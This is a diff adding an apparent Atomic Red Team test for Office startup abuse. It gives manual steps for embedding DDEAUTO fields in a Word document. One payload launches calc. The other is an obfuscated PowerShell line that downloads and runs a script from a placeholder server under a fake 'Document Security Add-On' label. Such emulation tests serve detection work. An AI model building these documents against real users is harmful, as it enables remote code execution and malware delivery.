diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml
new file mode 100644
index 00000000..0521f24b
--- /dev/null
+++ b/atomics/T1137/T1137.yaml
@@ -0,0 +1,39 @@
+---
+attack_technique: T1137
+display_name: Office Application Startup
+
+atomic_tests:
+- name: DDEAUTO
+  description: |
+
+    TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
+
+    SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
+
+    Word VBA Macro
+
+    [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: manual
+    steps: |
+      1. Open Word
+
+      2. Insert tab -> Quick Parts -> Field
+
+      3. Choose = (Formula) and click ok.
+
+      4. Once the field is inserted, you should now see "!Unexpected End of Formula"
+
+      5. Right-click the Field, choose "Toggle Field Codes"
+
+      6. Paste in the code from Unicorn or SensePost
+
+      7. Save the Word document.
+
+      9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
+
+      10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"